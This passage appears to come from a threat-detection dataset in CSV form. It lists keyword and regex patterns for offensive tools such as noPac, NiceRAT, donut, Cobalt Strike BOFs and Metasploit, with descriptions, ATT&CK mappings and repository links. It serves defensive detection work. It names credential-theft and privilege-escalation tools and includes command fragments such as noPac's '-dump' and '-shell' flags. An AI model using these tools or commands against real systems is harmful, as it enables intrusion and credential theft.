Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.csproj*",".{0,1000}NixImports\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.exe*",".{0,1000}NixImports\.exe.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.git*",".{0,1000}NixImports\.git.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*NixImports.sln*",".{0,1000}NixImports\.sln.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*nkbihfbeogaeaoehlefnkodbefgpgknn*",".{0,1000}nkbihfbeogaeaoehlefnkodbefgpgknn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nkddgncdjgjfcddamfgcmfnlhccnimig*",".{0,1000}nkddgncdjgjfcddamfgcmfnlhccnimig.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nlbmnnijcnlegkjjpcfjclmcfggfefdm*",".{0,1000}nlbmnnijcnlegkjjpcfjclmcfggfefdm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nmake inject_local *",".{0,1000}nmake\sinject_local\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*nmap *--script *",".{0,1000}nmap\s.{0,1000}\-\-script\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nmap/ncrack*",".{0,1000}nmap\/ncrack.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","1016","233","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z" "*nmap_port_scanner.py*",".{0,1000}nmap_port_scanner\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*nmap_port_scanner_ip_obj.py*",".{0,1000}nmap_port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*nmap_smb_scan_custom_*.txt*",".{0,1000}nmap_smb_scan_custom_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*nmapAnswerMachine.py*",".{0,1000}nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*nmap-reverse-lookup*",".{0,1000}nmap\-reverse\-lookup.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*",".{0,1000}nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*No credentials supplied* looking for null session shares!*",".{0,1000}No\scredentials\ssupplied.{0,1000}\slooking\sfor\snull\ssession\sshares!.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*no Mimik@tz - loaded successfully*",".{0,1000}no\sMimik\@tz\s\-\sloaded\ssuccessfully.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*No sandbox-indicative DLLs were discovered loaded in any accessible running process*",".{0,1000}No\ssandbox\-indicative\sDLLs\swere\sdiscovered\sloaded\sin\sany\saccessible\srunning\sprocess.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*No unixUserPassword Found*",".{0,1000}No\sunixUserPassword\sFound.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*no_session_payload.rb*",".{0,1000}no_session_payload\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NoApiUser.exe*",".{0,1000}NoApiUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*noclient: failed to execute %s: %s*",".{0,1000}noclient\:\sfailed\sto\sexecute\s\%s\:\s\%s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*noconsolation /tmp/*",".{0,1000}noconsolation\s\/tmp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*noconsolation --local *cmd.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*noconsolation --local *powershell.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*No-Consolation.cna*",".{0,1000}No\-Consolation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*NoConsolation.x64.o*",".{0,1000}NoConsolation\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*NoConsolation.x86.o*",".{0,1000}NoConsolation\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*No-Consolation-main*",".{0,1000}No\-Consolation\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","9","4","317","32","2024-04-08T14:15:00Z","2023-11-06T22:01:42Z" "*node stealer.js *",".{0,1000}node\sstealer\.js\s.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*NoFault\NoFault.*",".{0,1000}NoFault\\NoFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*NoFilter.exe *",".{0,1000}NoFilter\.exe\s.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*NoFilter-main.zip*",".{0,1000}NoFilter\-main\.zip.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*nop_shellcode.bin*",".{0,1000}nop_shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*noPac * -dc-ip * --impersonate *",".{0,1000}noPac\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*noPac.* -create-child*",".{0,1000}noPac\..{0,1000}\s\-create\-child.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dc-host *",".{0,1000}noPac\..{0,1000}\s\-dc\-host\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dc-ip *",".{0,1000}noPac\..{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -domain-netbios*",".{0,1000}noPac\..{0,1000}\s\-domain\-netbios.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -dump*",".{0,1000}noPac\..{0,1000}\s\-dump.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -hashes *",".{0,1000}noPac\..{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* --impersonate *",".{0,1000}noPac\..{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -just-dc-ntlm*",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-ntlm.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -just-dc-user *",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -new-name *",".{0,1000}noPac\..{0,1000}\s\-new\-name\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -no-add *",".{0,1000}noPac\..{0,1000}\s\-no\-add\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -pwd-last-set*",".{0,1000}noPac\..{0,1000}\s\-pwd\-last\-set.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -service-name *",".{0,1000}noPac\..{0,1000}\s\-service\-name\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -shell*",".{0,1000}noPac\..{0,1000}\s\-shell.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -shell-type *",".{0,1000}noPac\..{0,1000}\s\-shell\-type\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.* -use-ldap*",".{0,1000}noPac\..{0,1000}\s\-use\-ldap.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.csproj*",".{0,1000}noPac\.csproj.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*noPac.csproj.AssemblyReference.cache*",".{0,1000}noPac\.csproj\.AssemblyReference\.cache.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*noPac.py*",".{0,1000}noPac\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" "*noPac.sln*",".{0,1000}noPac\.sln.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*nopcorn/DuckDuckC2*",".{0,1000}nopcorn\/DuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" 